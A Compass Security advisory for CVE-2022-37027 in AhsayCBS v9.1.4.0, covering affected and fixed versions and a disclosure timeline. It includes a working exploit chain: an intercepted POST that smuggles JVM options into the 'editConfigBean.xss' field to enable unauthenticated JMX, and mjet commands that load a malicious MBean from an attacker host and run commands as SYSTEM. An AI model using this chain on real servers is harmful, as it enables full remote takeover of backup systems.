############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: AhsayCBS v9.1.4.0 for Windows # Vendor: Ahsay # CSNC ID: CSNC-2022-009 # CVE ID: CVE-2022-37027 # Subject: Authenticated Java Runtime Parameter Injection # Risk: High # Effect: Remotely exploitable # Author: Jan Friedli # Date: 14.09.2022 # ############################################################# Introduction ------------ "Ahsay Cloud Backup Suite (AhsayCBS) is an advanced client-server based on-premises and cloud backup software solution for Businesses and MSPs. The whole solution can be deployed within a company to back up all virtual machines, servers, desktops and laptops. MSPs can also use it for offering secure managed backup service to their clients [1]". Administrators (system users), who can modify the Runtime Options in the web interface can inject JVM Options. These take effect after a restart. This allows an attacker to achieve remote code execution as NT AUTHORITY\SYSTEM via enabling JMX. Affected -------- Vulnerable: v9.1.4.0 Not vulnerable: v9.3.2.48 Technical Description --------------------- As the system user navigate to https://[HOST]/cbs/system/ShowAdvanced.do. Click on save and intercept the request, e.g., using Burp. Alter the request parameter "editConfigBean.xss": POST /cbs/system/ShowAdvanced.do HTTP/1.1 Host: localhost Content-Length: 1069 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Origin: http://localhost Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [REDACTED] Connection: close editConfigBean.enableConfigRecovery=on&editConfigBean.autoSaveUseProxy=false&editConfigBean.proxyHost=& editConfigBean.proxyPort=&editConfigBean.proxyUsername=system&editConfigBean.proxyPassword=system1& editConfigBean.snmpPort=161&editConfigBean.snmpTrapRecv1.host=&editConfigBean.snmpTrapRecv1.trapPort=& editConfigBean.snmpTrapRecv2.host=&editConfigBean.snmpTrapRecv2.trapPort=& editConfigBean.snmpTrapRecv3.host=&editConfigBean.snmpTrapRecv3.trapPort=& editConfigBean.community=&showSystemFileBean.currentHome=& showSystemFileBean.currentDir=&showSystemFileBean.listDir=&showSystemFileBean.errMsg=& showSystemFileBean.selectHome=true&showSystemFileBean.listSystemFiles.callTrigger=& showSystemFileBean.listSystemFiles.rows%5B0%5D.id=0&showSystemFileBean.listSystemFiles.rows%5B1%5D.id=1& showSystemFileBean.listSystemFiles.rows%5B2%5D.id=2&editConfigBean.xmx=2048&editConfigBean.xms=1024& editConfigBean.xss=393216k%0D%0A-Dcom.sun.management.jmxremote%0D%0A-Dcom.sun.management.jmxremote.port%3D10010%0D%0A-Dcom.sun.management.jmxremote.rmi.port%3D10011%0D%0A-Dcom.sun.management.jmxremote.ssl%3Dfalse%0D%0A-Dcom.sun.management.jmxremote.authenticate%3Dfalse+%23&editConfigBean.xrs=true&editConfigBean.allowedIPOnServerTable.callTrigger=&editConfigBean.allowedIPOnServerTable.rows%5B0%5D.id=1220582084&callTrigger=RightBtn0 This injects the following payload in URL encoded form: 393216k -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=10010 -Dcom.sun.management.jmxremote.rmi.port=10011 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false # After a restart of the server, JMX is enabled. Exploit JMX using: https://github.com/mogwailabs/mjet: $ java -jar jython-standalone-2.7.3b1.jar mjet.py 10.6.207.66 10010 install super_secret http://10.6.207.64:8000 8000 Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true MJET - MOGWAI LABS JMX Exploitation Toolkit =========================================== [+] Starting webserver at port 8000 [+] Using JMX RMI [+] Connecting to: service:jmx:rmi:///jndi/rmi://10.6.207.66:10010/jmxrmi [+] Connected: rmi://10.6.207.64 3 [+] Loaded javax.management.loading.MLet [+] Loading malicious MBean from http://10.6.207.64:8000 [+] Invoking: javax.management.loading.MLet.getMBeansFromURL 10.6.207.66 - - [22/Jul/2022 15:10:55] "GET / HTTP/1.1" 200 - 10.6.207.66 - - [22/Jul/2022 15:10:55] "GET /emmqpcve.jar HTTP/1.1" 200 - [+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1 [+] Changing default password... [+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload [+] Successfully changed password [+] Done $ java -jar jython-standalone-2.7.3b1.jar mjet.py 10.6.207.66 10010 command super_secret "whoami" Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true MJET - MOGWAI LABS JMX Exploitation Toolkit =========================================== [+] Using JMX RMI [+] Connecting to: service:jmx:rmi:///jndi/rmi://10.6.207.66:10010/jmxrmi [+] Connected: rmi://10.6.207.64 4 [+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload [+] Executing command: whoami nt authority\system [+] Done This results in a system shell. Workaround / Fix ---------------- Install latest version with the hotfix v9.3.2.48. Timeline -------- 2022-06-09: Discovery by Jan Friedli 2022-06-09: Initial Contact 2022-06-27: Contacted again 2022-06.27: Contacted again 2022-08-12: Contacted multiple employees 2022-08-15: First succesful contact exchange 2022-09-01: Requested status update (no response) 2022-09-06: Hotfix supplied References ---------- [1] https://www.ahsay.com/jsp/en/products/ahsay-products_backup-software_overview.jsp